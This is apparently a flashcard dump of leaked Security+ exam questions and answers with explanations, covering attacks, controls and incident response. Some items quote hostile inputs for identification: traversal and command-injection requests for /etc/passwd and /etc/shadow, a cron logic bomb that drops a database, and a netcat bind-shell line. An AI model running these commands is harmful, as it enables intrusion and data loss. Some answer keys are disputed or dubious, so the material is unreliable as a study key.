Sy06 Exam Braindumps 151-200 Flashcards

1
Q

A SOC operator is analyzing a log file that contains the following entries:

[06-Apr-2021-18:00:06] GET /index.php/../../../../../../etc/passwd
[06-Apr-2021-18:01:07] GET /index.php/../../../../../../etc/shadow
[06-Apr-2021-18:01:26] GET /index.php/../../../../../../../../../../etc/passwd
[06-Apr-2021-18:02:16] GET /index.php?var1=;cat /etc/passwd;$var2=7865tgydk
[06-Apr-2021-18:02:56] GET /index.php?var1=;cat /etc/shadow;$var2=7865tgydk

Which of the following explains these log entries?

a. SQL injection and improper input-handling attempts
b. Cross-site scripting and resource exhaustion attempts
c. Command injection and directory traversal attempts
d. Error handling and privilege escalation attempts

A

c. Command injection and directory traversal attempts

Explanation:

c. Command injection and directory traversal attempts: The log entries show attempts to access sensitive files on the server by exploiting vulnerabilities. Specifically, the attacker is trying to use directory traversal (../../../../../../etc/passwd and ../../../../../../etc/shadow) to navigate to sensitive files. Additionally, the attacker is attempting command injection (var1=;cat /etc/passwd;) to execute commands on the server.

SQL injection and improper input-handling attempts: SQL injection involves inserting or injecting SQL queries via input data, which is not indicated by the given log entries. The log entries show attempts to access files and execute commands rather than SQL queries.

Cross-site scripting and resource exhaustion attempts: Cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users. Resource exhaustion attempts aim to deplete system resources. The log entries do not show evidence of either type of attack.

Error handling and privilege escalation attempts: Error handling involves managing errors in a system, and privilege escalation involves gaining higher-level access. The log entries do not specifically show evidence of attempts to exploit error handling or escalate privileges directly.

Command injection and directory traversal attempts accurately describe the nature of the log entries, which involve attempts to access sensitive files and execute commands on the server.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?

a. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.
b. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.
c. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.
d. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.

A

a. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.

Explanation:

a. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.: This describes the lessons learned phase, which is a critical part of the final phase of the incident response plan. It involves reviewing the incident to understand the effectiveness of the response, identifying root causes, and implementing measures to prevent future incidents.

b. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.: This describes the recovery phase, which occurs before the final phase. The recovery phase focuses on restoring systems to normal operation after the incident has been contained and eradicated.

c. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.: This describes the identification phase, which occurs at the beginning of the incident response process. This phase involves detecting and analyzing the incident to understand its scope and impact.

d. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.: This describes the containment phase, which focuses on limiting the spread and impact of the incident. It is not the final phase of the incident response plan.

The final phase of the incident response plan is crucial for improving future responses and enhancing the overall security posture of the organization. It provides an opportunity to learn from the incident and implement changes to prevent recurrence.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

HOTSPOT (Drag and Drop is not supported)
Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

  1. Attack Description :
    An attacker sends multiple SYNC packets from multiple sources
    Web server : Target Web Server
  2. Attack Description :
    The attack establishes a connection, which allows remote commands to be executed
    Web server : User
  3. Attack Description :
    The attack is self propagating and compromises a SQL database using well-known credentials as it moves through the network
    Web Server : Database server
  4. Attack Description :
    The attacker uses hardware to remotely monitor a user’s input activity to harvest credentials
    Web Server : Executive
  5. Attack Description :
    The attacker embeds hidden access in an internally developed application that bypasses account login
    Web Server : Application

Attack identified Best preventative or Remediation Action
a. Botnet a. Enable DDoS protection
b. RAT b. Patch Vulnerable systems
c. Logic Bomb c. Disable vulnerable services
d. Backdoor d. Change the default system password
e. Virus e. Update cryptographic algorithms
f. Spyware f. Change the default application password
g. Worm g. Implement 2FA using push notification
h. Adware h. Conduct a code review
i. Ransomware i. Implement a application fuzzing
j. Keylogger j. Implement a host-based IPS
k. Phishing k. Disable remote access service

A

An attacker sends multiple SYNC packets from multiple sources
Botnet, Enable DDoS protection

The attack establishes a conneciton which allows remote commands to be executed
RAT, Disable Remote access services

The attack is self-propagating and compromises a SQL database using well-known credentials as it moves though the network
Worm, change default application password

The attacker uses hardware to remotely monitor a user’s input activity to harvest credentials
Keylogger, implement 2FA using push notification

The attacker embeds hidden access in an internally developed application that bypasses account login
Backdoor, Conduct a code review

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

SIMULATION
A company recently added a DR site and is redesigning the network. Users at the DR site are having issues browsing websites.

https://free-braindumps.com/comptia/free-sy0-601-braindumps.html?p=40

INSTRUCTIONS
Click on each firewall to do the following:
1. Deny cleartext web traffic.
2. Ensure secure management protocols are used.
3. Resolve issues at the DR site.
The ruleset order cannot be modified due to outside constraints.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A

Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

SIMULATION
An attack has occurred against a company.

https://free-braindumps.com/comptia/free-sy0-601-braindumps.html?p=40

INSTRUCTIONS
You have been tasked to do the following:
-Identify the type of attack that is occurring on the network by clicking on the attacker’s tablet and reviewing the output.
-Identify which compensating controls a developer should implement on the assets, in order to reduce the effectiveness of future attacks by dragging them to the correct server.

All objects will be used, but not all placeholders may be filled. Objects may only be used once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Select type of attack :
1. SQL Injection
2. Cross Site Scripting
3. XML injection
4. Session Hijacking

Drag & drop :
Input validation
Code Review
WAF
URL Filtering
Record Level Access Control

against servers :
Web Server
Database
Application Source Code withing Repository
CRM Server

A
  1. Cross Site Scripting
    Web Server : WAF (Web Application Firewall), URL Filtering
    Database : Input Validation
    Application Source Code withing Repository : Code Review
    CRM Server : Record level access control
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

SIMULATION

https://free-braindumps.com/comptia/free-sy0-601-braindumps.html?p=40

A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802.1X using the most secure encryption and protocol available.

INSTRUCTIONS
Perform the following steps:
4. Configure the RADIUS server.
5. Configure the WiFi controller.
6. Preconfigure the client for an incoming guest. The guest AD credentials are:

User: guest01

Password: guestpass
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

WiFi Controller
SSID : CORPGUEST
Shared Key:
AAA Server IP :
PSK :
Authentication type :
Controller IP : 192.168.1.10

RADIUS server
Shared Key : SECRET
Client IP :
Authentication type :
Server IP: 192.168.1.20

Wireless Client
SSID :
Username :
User password :
PSK :
Authentication type :

A

WiFi Controller
SSID : CORPGUEST
Shared Key: SECRET
AAA Server IP : 192.168.1.20
PSK : Zack@123+
Authentication type : WPA2-PSK
Controller IP : 192.168.1.10

RADIUS server
Shared Key : SECRET
Client IP : 192.168.1.10
Authentication type : Active Directory
Server IP: 192.168.1.20

Wireless Client
SSID : CORPGUEST
Username : guest01
User password : guestpass
PSK : Zack@123+
Authentication type : WPA-PSK

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

HOTSPOT (Drag and Drop is not supported)
An incident has occurred in the production environment.

INSTRUCTIONS
Analyze the command outputs and identify the type of compromise.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

  1. Command ouput1
    $ cat /var/log/www/file.sh
    #!/bin/bash

user=’grep john /etc/password’
if [ $user = “”]; then
msql -u root -p mys3cr2tdbpw -e “drop database production”
fi

$crontab -l
*/5 * * * * /var/log/www/file.sh

Compromise type 1 :
a. RAT
b. Backdoor
c. Logic bomb
d. SQL injection
e. Rootkit

  1. Command Output 2
    $ cat /var/log/www/file.sh
    $!/bin/bash

date=”date +%Y-%m-%y”
echo “type in your full name : “
read loggedName
nc -l -p 31337 -e /bin/bash
wget www.eicar.org/download/eicar.com/txt
echo “Hello, $loggedInName the virus file has been downloaded”

Compromised Type 2 :
a. SQL injection
b. RAT
c. Rootkit
d. Backdoor
e. Logic bomb

A
  1. e. Rootkit
  2. b. RAT
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

After a recent security incident, a security analyst discovered that unnecessary ports were open on a firewall policy for a web server. Which of the following firewall polices would be MOST secure for a web server?

a. source Destination Port Action
Any Any TCP 53 Allow
Any Any TCP 80 Allow
Any Any TCP 443 Allow
Any Any Any Any

b. source Destination Port Action
Any Any TCP 53 Deny
Any Any TCP 80 Allow
Any Any TCP 443 Allow
Any Any Any Allow

c. source Destination Port Action
Any Any TCP 80 Deny
Any Any TCP 443 Allow
Any Any Any Allow

d. source Destination Port Action
Any Any TCP 80 Allow
Any Any TCP 443 Allow
Any Any Any Deny

A

d. source Destination Port Action
Any Any TCP 80 Allow
Any Any TCP 443 Allow
Any Any Any Deny

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional brownouts that last up to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of data loss?

a. Dual supply
b. Generator
c. UPS
d. POU
e. Daily backups

A

c. UPS (Uninterruptible Power Supply)
Explanation:

A UPS (Uninterruptible Power Supply) is the best solution in this scenario for several reasons:

Brief outages: A UPS can provide immediate power during brief outages that last for a few seconds to a few minutes, ensuring that equipment stays operational without interruption.

Extended outages and brownouts: While a UPS can handle brief outages on its own, it can also bridge the gap until a backup generator can be brought online during longer outages or intentional brownouts.

Protection from power fluctuations: A UPS can protect against power surges and brownouts, which can damage sensitive equipment or cause data corruption.

Here’s why other options are less suitable:

Dual supply: This ensures redundancy by using two power sources, but if both sources are affected by the same disruption (e.g., a brownout), it won't fully mitigate the risk.

Generator: A generator is excellent for extended outages, but it takes time to start up and does not protect against very brief outages. Combining a UPS with a generator would be ideal, but the UPS alone is necessary to handle the immediate power loss.

POU (Power Outlet Unit): This is typically used for distributing power within a data center but does not provide backup power.

Daily backups: While important for data recovery, they do not prevent data loss or service interruption during the power outages themselves. They address data loss after the fact, not in real-time.

Thus, a UPS is the most effective immediate solution to prevent data loss and ensure continuous operation during brief outages and while transitioning to a backup generator during extended power disruptions.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Which of the following would be the BEST way to analyze diskless malware that has infected a VDI?

a. Shut down the VDI and copy off the event logs.
b. Take a memory snapshot of the running system.
c. Use NetFlow to identify command-and-control IPs.
d. Run a full on-demand scan of the root volume.

A

b. Take a memory snapshot of the running system

VDI = Virtual Desktop Infrastructure

Here’s why this is the preferred option:

Preserves Current State: Taking a memory snapshot captures the current state of the running system, including any processes, network connections, and memory-resident malware.

Forensic Analysis: Memory snapshots allow forensic analysts to examine the active memory of the infected VDI instance. This can reveal running processes, injected code, network connections, and potentially malicious behavior.

Non-invasive: Unlike shutting down the VDI (option a), which could potentially disrupt or alter the malware's behavior, taking a memory snapshot is non-invasive and allows the VDI to continue running, potentially gathering more information about the malware's activities.

Focus on Volatile Data: Diskless malware typically operates in memory and may leave minimal traces on disk, making memory analysis crucial for identifying and understanding its activities.

Options c and d (using NetFlow to identify command-and-control IPs and running a full on-demand scan of the root volume) are less effective for analyzing diskless malware in a VDI context. NetFlow analysis might not capture all relevant details of a diskless malware’s behavior, and a traditional on-demand scan may not detect malware that operates entirely in memory.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of the following is this an example of?

a. AUP
b. NDA
c. SLA
d. MOU

A

a. AUP (Acceptable Use Policy)

Here’s why:

Acceptable Use Policy (AUP): AUPs are policies that define the rules and guidelines for using an organization's IT resources, including workstations and networks. They typically inform users about their responsibilities and limitations regarding the use of these resources. A banner presented at login that users must acknowledge (by clicking OK) serves as a form of acknowledgment and agreement to comply with the AUP.

Banner Warning: The banner presented to users upon login informs them that they have no reasonable expectation of privacy and that access is only for authorized personnel. By clicking OK, users acknowledge their understanding of these terms and agree to abide by them.

Options b, c, and d are not directly related to the scenario described:

NDA (Non-Disclosure Agreement): An NDA is a legal contract that outlines confidential material, knowledge, or information that parties wish to share with one another for certain purposes, but wish to restrict access to or by third parties.

SLA (Service Level Agreement): An SLA is a contract between a service provider and a customer that outlines the level of service the customer can expect, including metrics like uptime and response times.

MOU (Memorandum of Understanding): An MOU is a document outlining an agreement between parties that may not be legally binding but indicates a willingness to move forward with a certain course of action.

AUP vs NDA :

Acceptable Use Policy (AUP):
    AUPs govern the proper use of an organization's IT resources, defining rules and guidelines for users regarding access, behavior, and responsibilities.
    Typically, AUPs are presented to users upon accessing IT systems, requiring their acknowledgment and agreement to comply with stated policies.
    In the scenario described, users acknowledge their understanding and agreement to comply with the organization's IT usage policies (such as privacy expectations and authorized access) by clicking OK on a banner.

Non-Disclosure Agreement (NDA):
    NDAs are legal agreements between parties to protect confidential information shared during specific interactions or projects.
    They outline what information is considered confidential, who can access it, and the consequences of disclosing that information to unauthorized parties.
    NDAs are typically used in situations where confidential information, trade secrets, or proprietary data need protection from unauthorized disclosure.

In the scenario where users are presented with a banner upon login, the primary focus is on informing users about their responsibilities and limitations regarding IT system usage, not about protecting specific confidential information or trade secrets. Therefore, while NDAs are crucial for protecting sensitive information in certain contexts, they are not directly applicable to the situation where users are agreeing to comply with IT usage policies.

In summary, AUP is the most appropriate answer because it directly relates to the rules governing the use of IT resources and user responsibilities in the described scenario.

(Braindump : b)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees’ workstations to prevent information from leaving the company’s network?

a. HIPS
b. DLP
c. HIDS
d. EDR

A

b. DLP (Data Loss Prevention)

Here’s why DLP is the most appropriate choice:

Data Loss Prevention (DLP): DLP solutions are designed to monitor, detect, and prevent the unauthorized transmission of sensitive data outside the organization's network. They can enforce policies that govern what type of data can be sent via email, including scanning email content and attachments for sensitive information like PII, financial data, or confidential business information.

Functionality: DLP solutions can identify sensitive data based on predefined policies (such as keywords, regular expressions, or data classification) and enforce actions (such as blocking, encrypting, or alerting) when unauthorized transmissions occur.

Application to the Scenario: In this case, deploying DLP on employees' workstations would help mitigate the risk of employees inadvertently or intentionally sending sensitive information via personal email accounts. It provides a proactive measure to enforce company policies regarding data protection and ensures that sensitive data remains within authorized channels.

In contrast, the other options are less directly focused on preventing unauthorized data transmission via personal email:

HIPS (Host-based Intrusion Prevention System): Primarily focused on detecting and blocking unauthorized network attacks and exploits targeting specific host systems.
HIDS (Host-based Intrusion Detection System): Monitors and analyzes the internals of a computing system (like logs and file system changes) for signs of intrusion or unauthorized activities.
EDR (Endpoint Detection and Response): Provides real-time monitoring and response to threats on endpoints, focusing more on detecting and responding to malicious activities rather than preventing data loss through unauthorized emails.

(Braindump : d. EDR)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering techniques is being utilized?

a. Shoulder surfing
b. Watering-hole attack
c. Tailgating
d. Impersonation

A

c. Tailgating

Explanation:

Tailgating: This occurs when an unauthorized individual follows closely behind an authorized person to gain entry into a restricted area without proper authentication. In this case, the unknown individual is taking advantage of the employee's courtesy by holding the door open and thereby bypassing the secure access control, exploiting the trusting nature of the employee.

Shoulder surfing: Involves observing someone's confidential information (like passwords or PINs) by looking over their shoulder as they enter it.

Watering-hole attack: Targets a specific group by compromising websites they are likely to visit, rather than physical access scenarios.

Impersonation: Involves pretending to be someone else to gain access, which is not explicitly demonstrated in the scenario provided.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Two hospitals merged into a single organization. The privacy officer requested a review of all records to ensure encryption was used during record storage, in compliance with regulations. During the review, the officer discovered that medical diagnosis codes and patient names were left unsecured. Which of the following types of data does this combination BEST represent?

a. Personal health information
b. Personally identifiable information
c. Tokenized data
d. Proprietary data

A

a. Personal health information (PHI)

Explanation:

Personal health information (PHI) includes any individually identifiable health information that is held or maintained by a covered entity or business associate. This includes medical diagnosis codes, patient names, and other health-related information.

Personally identifiable information (PII) typically refers to any information that can be used to identify an individual, which could include personal health information but is broader in scope.

Tokenized data refers to data that has been replaced with a non-sensitive equivalent (token) that has no extrinsic or exploitable meaning or value.

Proprietary data refers to information that is owned or controlled by an organization and is not specifically related to personal or health information.

In the context provided, the concern about medical diagnosis codes and patient names being left unsecured directly relates to the privacy and security requirements around personal health information (PHI), making option a. Personal health information the most appropriate choice.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

A company discovered that terabytes of data have been exfiltrated over the past year after an employee clicked on an email link. The threat continued to evolve and remain undetected until a security analyst noticed an abnormal amount of external connections when the employee was not working. Which of the following is the MOST likely threat actor?

a. Shadow IT
b. Script kiddies
c. APT
d. Insider threat

A

c. APT (Advanced Persistent Threat)

Explanation:

Advanced Persistent Threat (APT): APTs are sophisticated adversaries, often state-sponsored or well-funded, that conduct prolonged and targeted attacks on specific organizations. They are characterized by their ability to remain undetected for extended periods, exfiltrate large amounts of data, and adapt their tactics to avoid detection.

Here’s why the other options are less likely:

Shadow IT: Refers to unauthorized applications or services used within an organization without explicit approval. While it can pose security risks, it typically doesn't involve sophisticated data exfiltration over an extended period as described.

Script kiddies: Usually refer to individuals with limited technical skills who use existing scripts or tools to launch simple attacks. They are unlikely to sustain a sophisticated operation over a year without detection.

Insider threat: While an insider could be involved in data exfiltration, the prolonged nature and sophistication of the attack described (abnormal external connections over a long period) suggest a more organized and persistent threat actor than a typical insider threat scenario.

Therefore, considering the prolonged and stealthy nature of the attack targeting specific data, an Advanced Persistent Threat (APT) is the most plausible threat actor in this case.

(Braindump : d. Insider threat)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security analyst determines the certificate is signed properly and is a valid wildcard. This same certificate is installed on the other company servers without issue. Which of the following is the MOST likely reason for this finding?

a. The required intermediate certificate is not loaded as part of the certificate chain.
b. The certificate is on the CRL and is no longer valid.
c. The corporate CA has expired on every server, causing the certificate to fail verification.
d. The scanner is incorrectly configured to not trust this certificate when detected on the server.

A

a. The required intermediate certificate is not loaded as part of the certificate chain.

Explanation:

Intermediate Certificate: When an SSL/TLS certificate is issued, it often relies on an intermediate certificate (or chain of intermediate certificates) to verify its authenticity up to a trusted root certificate authority (CA). If the intermediate certificate is not properly installed on the server along with the SSL certificate, the server may not send the full certificate chain during the SSL handshake.

SSL Certificate Chain: During the SSL handshake process, the client (vulnerability scanner, in this case) needs to verify the entire chain of certificates from the server's SSL certificate up to a trusted root certificate authority. If any intermediate certificate is missing, the chain of trust is broken, and the certificate might appear as untrusted to the scanner.

Other Options Explanation:
    b. The certificate is on the CRL and is no longer valid: This would typically result in the certificate being flagged as revoked, not untrusted.
    c. The corporate CA has expired on every server, causing the certificate to fail verification: This would indicate an issue with the corporate CA's validity, not specifically with the SSL certificate's trust status.
    d. The scanner is incorrectly configured to not trust this certificate when detected on the server: This would be a configuration issue on the scanner side and less likely the reason for the untrusted status if the certificate is valid and properly configured on other servers.

Therefore, a. The required intermediate certificate is not loaded as part of the certificate chain is the most likely reason for the vulnerability scanner to report the SSL certificate as untrusted despite its validity and installation on other servers without issue.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

A company wants to improve end users’ experiences when they log in to a trusted partner website. The company does not want the users to be issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own credentials to log in to the trusted partner’s website?

a. Directory service
b. AAA server
c. Federation
d. Multifactor authentication

A

c. Federation

Explanation:

Federation enables a single sign-on (SSO) experience across different organizations or domains. It allows users to use their existing credentials from one organization (in this case, the company's credentials) to access services and resources in another organization (the trusted partner's website).

How Federation Works:
    The company and the trusted partner establish a trust relationship.
    Users authenticate once with their company's identity provider (IdP).
    Upon accessing the trusted partner's website, the company's IdP securely passes authentication information to the partner's service provider (SP).
    The SP trusts the authentication from the IdP and grants access without requiring the user to re-enter credentials.

Benefits of Federation:
    Simplifies user experience by eliminating the need for separate credentials.
    Enhances security as authentication and authorization are handled centrally by the company's IdP.
    Reduces administrative overhead by managing user accounts centrally.

Other Options Explained:

a. Directory service: While directory services manage user identities and permissions within an organization, they typically do not facilitate SSO across different domains or organizations.

b. AAA server (Authentication, Authorization, and Accounting): AAA servers are used for managing network access and are not specifically designed for cross-organization authentication.

d. Multifactor authentication (MFA): While MFA enhances security by requiring multiple factors for authentication, it does not address the requirement of using existing credentials across organizations without issuing separate credentials.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

A company is under investigation for possible fraud. As part of the investigation, the authorities need to review all emails and ensure data is not deleted. Which of the following should the company implement to assist in the investigation?

a. Legal hold
b. Chain of custody
c. Data loss prevention
d. Content filter

A

a. Legal hold

Explanation:

Legal hold is a process in which an organization preserves all relevant information related to a legal case or investigation. It ensures that potentially relevant data, including emails, cannot be deleted, altered, or destroyed. Here’s why it's the correct choice:

Preservation of Data: Legal hold mandates that all potentially relevant data, including emails, must be preserved in its original state. This prevents any tampering or deletion that could hinder the investigation.

Compliance: It ensures compliance with legal and regulatory requirements by preserving data that may be subject to investigation or litigation.

Process: Legal hold involves identifying and suspending the routine deletion or modification of relevant data, including emails, and keeping them intact until the hold is lifted.

Other Options Explained:

b. Chain of custody: Chain of custody refers to the chronological documentation or paper trail that records the sequence of custody, control, transfer, analysis, and disposition of physical and electronic evidence. While important for maintaining evidence integrity, it primarily applies to physical evidence rather than digital data like emails.

c. Data loss prevention (DLP): DLP systems aim to prevent unauthorized transmission of sensitive information outside the organization. While they can help prevent accidental or malicious data leaks, they do not specifically ensure that data is preserved for legal investigations.

d. Content filter: Content filters are used to monitor and control the flow of data, typically to enforce acceptable use policies and protect against malware and phishing. They do not focus on preserving data for legal investigations.

Therefore, a. Legal hold is the best choice for ensuring that emails and other relevant data are preserved intact and accessible for the investigation without the risk of deletion or alteration.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

A user wanted to catch up on some work over the weekend but had issues logging in to the corporate network using a VPN. On Monday, the user opened a ticket for this issue but was able to log in successfully. Which of the following BEST describes the policy that is being implemented?

a. Time-based logins
b. Geofencing
c. Network location
d. Password history

A

a. Time-based logins

Explanation:

Time-based logins refer to policies or configurations that restrict or allow access to systems, networks, or applications based on specific times or schedules. In this case:
    The user experienced issues logging in over the weekend but was able to log in successfully on Monday.
    This inconsistency suggests that access might be restricted or problematic during non-standard hours (such as weekends) due to time-based access controls.

Why the Other Options are Not Appropriate:

b. Geofencing: Geofencing policies restrict access based on the physical location of the user. However, the issue described does not involve location-based access restrictions but rather time-based access.

c. Network location: Similar to geofencing, network location policies define access based on the user's network location (e.g., internal network vs. external network). This scenario does not indicate any issues related to network location restrictions.

d. Password history: Password history policies dictate how frequently passwords can be reused or how often they must be changed. This is unrelated to the described issue of intermittent access during specific times.

Therefore, a. Time-based logins is the most appropriate description of the policy being implemented based on the user’s experience of successful login during standard work hours but issues during the weekend.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage. Which of the following BEST describes these threat actors?

a. Semi-authorized hackers
b. State actors
c. Script kiddies
d. Advanced persistent threats

A

b. State actors

Explanation:

State actors are typically government-sponsored entities or groups acting on behalf of a government. They often have significant resources, capabilities, and motivations to conduct cyber attacks for political, economic, or military purposes.

Why the Other Options are Not Appropriate:

a. Semi-authorized hackers: This term is less commonly used in cybersecurity and does not specifically denote state-sponsored activity. It might imply individuals with some level of authorization but does not fit the description of government-backed actors.

c. Script kiddies: Script kiddies are individuals who use existing tools and scripts to launch attacks without deep technical knowledge. They are generally not sophisticated enough to orchestrate a breach of this scale or purpose.

d. Advanced persistent threats (APTs): APTs are typically sophisticated threat actors that maintain long-term access to a target network or system for espionage or data exfiltration. While they can be state-sponsored, the scenario does not explicitly describe ongoing persistence but rather a breach and immediate public dissemination.

Therefore, b. State actors best describes the threat actors involved in breaching a major political party’s server and leaking sensitive communications for political advantage.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?

a. Default system configuration
b. Unsecure protocols
c. Lack of vendor support
d. Weak encryption

A

c. Lack of vendor support

Explanation:

Legacy software often ceases to receive vendor support over time, which means the vendor no longer provides updates, security patches, or technical assistance. This lack of support leaves the software vulnerable to newly discovered vulnerabilities and exploits.

Why the Other Options are Not Appropriate:

a. Default system configuration: While legacy software may retain default configurations, the primary risk lies in the absence of security updates rather than the configuration itself.

b. Unsecure protocols: This could be a concern with legacy software, but it's not the most direct risk associated with continuing to use it. The lack of vendor support poses a more immediate threat.

d. Weak encryption: This could also be a concern depending on the software, but again, it's not the most direct risk posed by lack of vendor support.

Therefore, c. Lack of vendor support is the best explanation because it directly addresses the risk of not receiving necessary updates and patches to secure the software against evolving threats.

22
Q

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST describes the type of assessment taking place?

a. Input validation
b. Dynamic code analysis
c. Fuzzing
d. Manual code review

A

b. Dynamic code analysis

Explanation:

Dynamic code analysis, also known as dynamic application security testing (DAST), involves assessing applications in a runtime environment to identify vulnerabilities and security issues. This process typically involves interacting with the running application to simulate how an attacker might exploit it. It focuses on identifying weaknesses that could be exploited while the application is running.

Why the Other Options are Not Appropriate:

a. Input validation: This term refers to a specific aspect of security testing related to ensuring that input data is correctly handled and validated by the application, which is different from the broader runtime assessment described.

c. Fuzzing: Fuzzing involves feeding invalid, unexpected, or random data as inputs to a software application to identify vulnerabilities. While related to dynamic analysis, it specifically focuses on input handling and fault tolerance testing.

d. Manual code review: This involves a manual inspection of the source code to identify potential security issues and bugs before deployment, which is not the same as assessing programs in a runtime environment.

Therefore, b. Dynamic code analysis aligns best with the scenario where runtime assessment is conducted to find critical issues in deployed programs.

23
Q

Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?

a. Smart card
b. Push notifications
c. Attestation service
d. HMAC-based
e. one-time password

A

b. Push notifications

Explanation:

Push notifications can serve a dual purpose in security:

Authentication Method: Push notifications are commonly used in two-factor authentication (2FA) setups where a user receives a push notification on their registered device (like a smartphone) to approve or deny access to an application or service.

Alerting Mechanism: Push notifications can also serve as an alerting mechanism for unauthorized access attempts. If an unauthorized attempt is made and triggers a push notification (even if the user doesn't approve it), it can alert the user and possibly security operations about the attempted access.

Why the Other Options are Not as Suitable:

a. Smart card: While smart cards provide authentication, they do not typically function as alerting mechanisms for unauthorized access attempts.

c. Attestation service: Attestation services verify the integrity and authenticity of software and hardware components but are not directly involved in user authentication or unauthorized access alerting.

d. HMAC-based: HMAC (Hash-based Message Authentication Code) is a mechanism used for message integrity and authentication but is not typically used as an authentication method for users or for alerting unauthorized access attempts.

e. One-time password: One-time passwords (OTP) are used for authentication but do not directly serve as alerting mechanisms for unauthorized access attempts.

Therefore, b. Push notifications is the most appropriate choice as it integrates authentication with the ability to alert users and administrators about potential unauthorized access attempts in real-time.

24
Q

A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers without migrating servers to a new network. Which of the following solutions should the company implement?

a. Intranet
b. Screened subnet
c. VLAN segmentation
d. Zero Trust

A

c. VLAN segmentation

Explanation:

VLAN segmentation allows you to logically divide a single physical network into multiple virtual networks (VLANs). Each VLAN operates as a separate broadcast domain, enabling you to isolate traffic between different segments. This segmentation can be achieved without physically restructuring the network, making it ideal for cloud environments where servers are often provisioned within a single network segment.

Intranet: An intranet is a private network within an organization, typically accessed via a VPN or similar secure connection, but it doesn't provide segmentation within a single network.

Screened subnet: This involves placing a firewall between two networks to control traffic, which may not be directly applicable to a cloud environment without additional complexity.

Zero Trust: Zero Trust is a security model that assumes all access attempts are potentially malicious and verifies each request as though it originates from an open network, but it's a broader strategy rather than a specific segmentation solution.

Therefore, VLAN segmentation is the most practical solution for segmenting production and non-production servers within a flat network in the cloud, allowing for isolation of traffic and enhanced security without the need for physical network restructuring.

25
Q

The president of a regional bank likes to frequently provide SOC tours to potential investors. Which of the following policies BEST reduces the risk of malicious activity occurring after a tour?

a. Password complexity
b. Acceptable use
c. Access control
d. Clean desk

A

(Community D 70%, C 30%)
d. Clean desk

Here’s why:

